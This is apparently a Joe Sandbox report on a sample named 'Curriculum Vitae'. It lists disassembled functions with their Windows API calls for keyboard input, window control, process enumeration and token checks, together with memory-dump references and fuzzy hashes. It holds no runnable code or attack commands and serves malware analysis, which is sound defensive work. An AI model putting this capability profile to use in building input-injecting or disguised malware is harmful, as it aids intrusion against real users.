                      • Opcode ID: 7985764fbfdb1736019c6217de67a360c44d5d7d1c7c9ebb0f0189be69bb9b19
                      • Instruction ID: 4d8b33b693b9483532078c6dd6b2ff82a7f001143bad82afbf0c7f242f10752b
                      • Opcode Fuzzy Hash: 7985764fbfdb1736019c6217de67a360c44d5d7d1c7c9ebb0f0189be69bb9b19
                      • Instruction Fuzzy Hash: 20412B75A00714BFD724AF38CC41BAA7BE9EB84720F10852BF546DB291D771A94187B0
                      Function 00DA56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                      Download Yara Rule
                      APIs
                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00DA5783
                      • GetLastError.KERNEL32(?,00000000), ref: 00DA57A9
                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00DA57CE
                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00DA57FA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CreateHardLink$DeleteErrorFileLast
                      • String ID:
                      • API String ID: 3321077145-0
                      • Opcode ID: 7b2d8f89ac3de9bea857a0d4ed5780a29f5342ea3c15d6fd21f751b097ffae46
                      • Instruction ID: 93b608ebd442c8c0baebd04384c0a11794c161d24b4c161543f98da3c1982e99
                      • Opcode Fuzzy Hash: 7b2d8f89ac3de9bea857a0d4ed5780a29f5342ea3c15d6fd21f751b097ffae46
                      • Instruction Fuzzy Hash: E9410C39600A15DFCB25DF15C544A59BBE2EF89320F198488E94AAB362CB34FD41CBB1
                      Function 00D6D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00D56D71,00000000,00000000,00D582D9,?,00D582D9,?,00000001,00D56D71,8BE85006,00000001,00D582D9,00D582D9), ref: 00D6D910
                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D6D999
                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00D6D9AB
                      • __freea.LIBCMT ref: 00D6D9B4
                        • Part of subcall function 00D63820: RtlAllocateHeap.NTDLL(00000000,?,00E01444,?,00D4FDF5,?,?,00D3A976,00000010,00E01440,00D313FC,?,00D313C6,?,00D31129), ref: 00D63852
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                      • String ID:
                      • API String ID: 2652629310-0
                      • Opcode ID: 623799092d70011e3029f7b3b55bd597f4de88a01cd6e5f3c41c55b26dd53ebc
                      • Instruction ID: b99e208803a936a12cb467d27d3ecb856541d73f09a98cddd672f5a4d47085ca
                      • Opcode Fuzzy Hash: 623799092d70011e3029f7b3b55bd597f4de88a01cd6e5f3c41c55b26dd53ebc
                      • Instruction Fuzzy Hash: 7931BC72A0020AABDF24DF65EC45EAF7BA6EB41310B094269FC08D7250EB35CD54CBB0
                      Function 00DC52C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00DC5352
                      • GetWindowLongW.USER32(?,000000F0), ref: 00DC5375
                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DC5382
                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00DC53A8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: LongWindow$InvalidateMessageRectSend
                      • String ID:
                      • API String ID: 3340791633-0
                      • Opcode ID: 1a53edd0e7babe9cd4f06d53e9f9ff930acb30946596fe1468d23eaa59ceed6f
                      • Instruction ID: b6d35ba01565dea2e0886ebefd1c2c423b476705907ab08b49364731489db208
                      • Opcode Fuzzy Hash: 1a53edd0e7babe9cd4f06d53e9f9ff930acb30946596fe1468d23eaa59ceed6f
                      • Instruction Fuzzy Hash: 5A31F230B55A8AEFEB309A54EC05FE83761AB04390F5C410AFA51972E5C7B1B9C09B71
                      Function 00D9AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                      Download Yara Rule
                      APIs
                      • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00D9ABF1
                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00D9AC0D
                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00D9AC74
                      • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00D9ACC6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: KeyboardState$InputMessagePostSend
                      • String ID:
                      • API String ID: 432972143-0
                      • Opcode ID: 6943bb8ae39a7bf104e10ac441b032bebc28654b04faaba617885309e8a77d3c
                      • Instruction ID: 8b9464ddee89c3034d70bef1dc67c10e5a8dac5f78b7ddb7f5088da1774f470f
                      • Opcode Fuzzy Hash: 6943bb8ae39a7bf104e10ac441b032bebc28654b04faaba617885309e8a77d3c
                      • Instruction Fuzzy Hash: 39313736A403196FEF34CB6D8C04BFA7BA5AB89311F08471AE4859B2D0C374898187F2
                      Function 00DC7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                      Download Yara Rule
                      APIs
                      • ClientToScreen.USER32(?,?), ref: 00DC769A
                      • GetWindowRect.USER32(?,?), ref: 00DC7710
                      • PtInRect.USER32(?,?,00DC8B89), ref: 00DC7720
                      • MessageBeep.USER32(00000000), ref: 00DC778C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Rect$BeepClientMessageScreenWindow
                      • String ID:
                      • API String ID: 1352109105-0
                      • Opcode ID: 7a11634fc036dbab91c40110379bb3b497044d7bb03a5008fa19a96e79ef8e40
                      • Instruction ID: b70e709497948cdde3d9d780c0bc92ac661a52c1869fbb1272f6b5633e001a6c
                      • Opcode Fuzzy Hash: 7a11634fc036dbab91c40110379bb3b497044d7bb03a5008fa19a96e79ef8e40
                      • Instruction Fuzzy Hash: CA417C3460521A9FCB01CF69C894FA977F5FB49314F1941ACE514AB2A1C731E986CFA0
                      Function 00DC16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                      Download Yara Rule
                      APIs
                      • GetForegroundWindow.USER32 ref: 00DC16EB
                        • Part of subcall function 00D93A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D93A57
                        • Part of subcall function 00D93A3D: GetCurrentThreadId.KERNEL32 ref: 00D93A5E
                        • Part of subcall function 00D93A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00D925B3), ref: 00D93A65
                      • GetCaretPos.USER32(?), ref: 00DC16FF
                      • ClientToScreen.USER32(00000000,?), ref: 00DC174C
                      • GetForegroundWindow.USER32 ref: 00DC1752
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                      • String ID:
                      • API String ID: 2759813231-0
                      • Opcode ID: f22de12c006f5959d3641cead01e38f13d4cd72e26c1fa5a6b8c4a3eda1344cb
                      • Instruction ID: a1f931b36f24f7a60907c100ce80a34436e212a7ae8dd1a3b3e89a74f6090f17
                      • Opcode Fuzzy Hash: f22de12c006f5959d3641cead01e38f13d4cd72e26c1fa5a6b8c4a3eda1344cb
                      • Instruction Fuzzy Hash: 2D313075D10249AFCB04EFA9C881DAEB7F9EF49304B5480A9E415E7252D631DE45CFB0
                      Function 00D9D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                      Download Yara Rule
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00D9D501
                      • Process32FirstW.KERNEL32(00000000,?), ref: 00D9D50F
                      • Process32NextW.KERNEL32(00000000,?), ref: 00D9D52F
                      • CloseHandle.KERNEL32(00000000), ref: 00D9D5DC
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                      • String ID:
                      • API String ID: 420147892-0
                      • Opcode ID: ef3df758a9208b099acd459ba7f7c91b6873b6f86d4682f503b03e06909742a6
                      • Instruction ID: da77e36a9ffef18f0213b89868a968974f97b3ab3bba286be7b98f789b550a46
                      • Opcode Fuzzy Hash: ef3df758a9208b099acd459ba7f7c91b6873b6f86d4682f503b03e06909742a6
                      • Instruction Fuzzy Hash: 05319F711083019FD700EF64C891AAFBBE8EF99354F58092DF585862A1EB719949CBB2
                      Function 00DC8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D49BB2
                      • GetCursorPos.USER32(?), ref: 00DC9001
                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00D87711,?,?,?,?,?), ref: 00DC9016
                      • GetCursorPos.USER32(?), ref: 00DC905E
                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00D87711,?,?,?), ref: 00DC9094
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                      • String ID:
                      • API String ID: 2864067406-0
                      • Opcode ID: b3079c45e2921ba91e687d891f40323b88d62ed2292dadda6849c92f75005c30
                      • Instruction ID: 771779d2cd32bb8302b653d5ac6ef855a12c8b0946127858a42702d6144e29dd
                      • Opcode Fuzzy Hash: b3079c45e2921ba91e687d891f40323b88d62ed2292dadda6849c92f75005c30
                      • Instruction Fuzzy Hash: 9521A135610119EFCB258F95CC68FFABBB9EF89350F044159F9059B261C3319990EB70
                      Function 00D9D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                      Download Yara Rule
                      APIs
                      • GetFileAttributesW.KERNEL32(?,00DCCB68), ref: 00D9D2FB
                      • GetLastError.KERNEL32 ref: 00D9D30A
                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00D9D319
                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00DCCB68), ref: 00D9D376
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CreateDirectory$AttributesErrorFileLast
                      • String ID:
                      • API String ID: 2267087916-0
                      • Opcode ID: 1ad99a4d15d17a23913ede7014f39fa4634d2d01ce16de05207af6ce1d57e415
                      • Instruction ID: c87f86b5a8d9c846cf3c66f0b4d19112a025ec0297da01f75e4c2c49a2616169
                      • Opcode Fuzzy Hash: 1ad99a4d15d17a23913ede7014f39fa4634d2d01ce16de05207af6ce1d57e415
                      • Instruction Fuzzy Hash: DC21A170508302DF8B00DF68C88186AB7E5EF56365F544A1DF499C32A1D730D94ACBB3
                      Function 00D91571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D91014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00D9102A
                        • Part of subcall function 00D91014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00D91036
                        • Part of subcall function 00D91014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D91045
                        • Part of subcall function 00D91014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00D9104C
                        • Part of subcall function 00D91014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D91062
                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00D915BE
                      • _memcmp.LIBVCRUNTIME ref: 00D915E1
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D91617
                      • HeapFree.KERNEL32(00000000), ref: 00D9161E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                      • String ID:
                      • API String ID: 1592001646-0
                      • Opcode ID: aa0eb1d61e919c3bbdaeb7145c237770df110134ea4c5fb7f798a6f14ecf8ef4
                      • Instruction ID: c23dc10379f37ea5a0443a8b36cabc4edfc0513237dc5b745012ee59161be473
                      • Opcode Fuzzy Hash: aa0eb1d61e919c3bbdaeb7145c237770df110134ea4c5fb7f798a6f14ecf8ef4
                      • Instruction Fuzzy Hash: D0219A36E4020AEFDF10DFA4C945BEEB7B8EF44344F094459E445AB241E730AA05CBB0
                      Function 00DC2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                      Download Yara Rule
                      APIs
                      • GetWindowLongW.USER32(?,000000EC), ref: 00DC280A
                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DC2824
                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DC2832
                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00DC2840
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$Long$AttributesLayered
                      • String ID:
                      • API String ID: 2169480361-0
                      • Opcode ID: 73f7377ac3b6c0de5035b25a9f4791b876b4430f0174ff0c41783219dbff99ac
                      • Instruction ID: 2c242f66737b1a5623068a2bfabd24bfb8edd8e27898d3a0fca7c02d812d0a28
                      • Opcode Fuzzy Hash: 73f7377ac3b6c0de5035b25a9f4791b876b4430f0174ff0c41783219dbff99ac
                      • Instruction Fuzzy Hash: 9F21B231214612AFD7149B24C884F7A77A5EF45324F14815CF516CB6E2C771EC42C7B0
                      Function 00D978F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D98D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00D9790A,?,000000FF,?,00D98754,00000000,?,0000001C,?,?), ref: 00D98D8C
                        • Part of subcall function 00D98D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00D98DB2
                        • Part of subcall function 00D98D7D: lstrcmpiW.KERNEL32(00000000,?,00D9790A,?,000000FF,?,00D98754,00000000,?,0000001C,?,?), ref: 00D98DE3
                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00D98754,00000000,?,0000001C,?,?,00000000), ref: 00D97923
                      • lstrcpyW.KERNEL32(00000000,?), ref: 00D97949
                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00D98754,00000000,?,0000001C,?,?,00000000), ref: 00D97984
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: lstrcmpilstrcpylstrlen
                      • String ID: cdecl
                      • API String ID: 4031866154-3896280584
                      • Opcode ID: 1d3d9de138076918a2c839991159ae01ebd00c7329bdaf8b2d57843eace93bea
                      • Instruction ID: 319a045e0b44ff3f3a1b2ec6c97f6bf75ff333c72ed7e7936f96133eda325b6b
                      • Opcode Fuzzy Hash: 1d3d9de138076918a2c839991159ae01ebd00c7329bdaf8b2d57843eace93bea
                      • Instruction Fuzzy Hash: 8211E13A210302AFCF159F35D844E7A77A9FF85350B14402AF946CB2A4EB319801CBB1
                      Function 00DC7CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                      Download Yara Rule
                      APIs
                      • GetWindowLongW.USER32(?,000000F0), ref: 00DC7D0B
                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00DC7D2A
                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00DC7D42
                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00DAB7AD,00000000), ref: 00DC7D6B
                        • Part of subcall function 00D49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D49BB2
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$Long
                      • String ID:
                      • API String ID: 847901565-0
                      • Opcode ID: 426aeab8f4798e9404f841a60935375e3d7ea54f9c5853c765c9663a9c840f10
                      • Instruction ID: 01388d6506172ebd56bac9ead953922e98cbd5c60618585afff692998d514733
                      • Opcode Fuzzy Hash: 426aeab8f4798e9404f841a60935375e3d7ea54f9c5853c765c9663a9c840f10
                      • Instruction Fuzzy Hash: 60119031614616AFCB109F29DC04FA63BA5AF45360F154728F93ADB2F0D7319991CF60
                      Function 00DC5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 00DC56BB
                      • _wcslen.LIBCMT ref: 00DC56CD
                      • _wcslen.LIBCMT ref: 00DC56D8
                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00DC5816
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend_wcslen
                      • String ID:
                      • API String ID: 455545452-0
                      • Opcode ID: 378bcc4de598e99c004729336d4062d7bb764073be95bfae1a6585bc268e908e
                      • Instruction ID: e34e24bd7d1b50b62ffe666e139f3d6e57275022d46a88b2791c407d762d4e54
                      • Opcode Fuzzy Hash: 378bcc4de598e99c004729336d4062d7bb764073be95bfae1a6585bc268e908e
                      • Instruction Fuzzy Hash: 9511CD3164060A96DF209B61AC85FEE37ACEB11364B14406EF955D7085EB70EAC58F70
                      Function 00D91A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00D91A47
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D91A59
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D91A6F
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D91A8A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID:
                      • API String ID: 3850602802-0
                      • Opcode ID: 4d9f2dee350ec4a3ad13233fd872d4b370e4e20d175b8128e4a37501343f809f
                      • Instruction ID: 03bc655fbd8df3aa5c5a2c13cf5b4f077509a7eba8f32a739c6f0094a460a810
                      • Opcode Fuzzy Hash: 4d9f2dee350ec4a3ad13233fd872d4b370e4e20d175b8128e4a37501343f809f
                      • Instruction Fuzzy Hash: 5A110C3AD4121AFFEF11DBA5CD85FADBB78EB04750F200091E604B7290D6716E51DBA4
                      Function 00D9E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                      Download Yara Rule
                      APIs
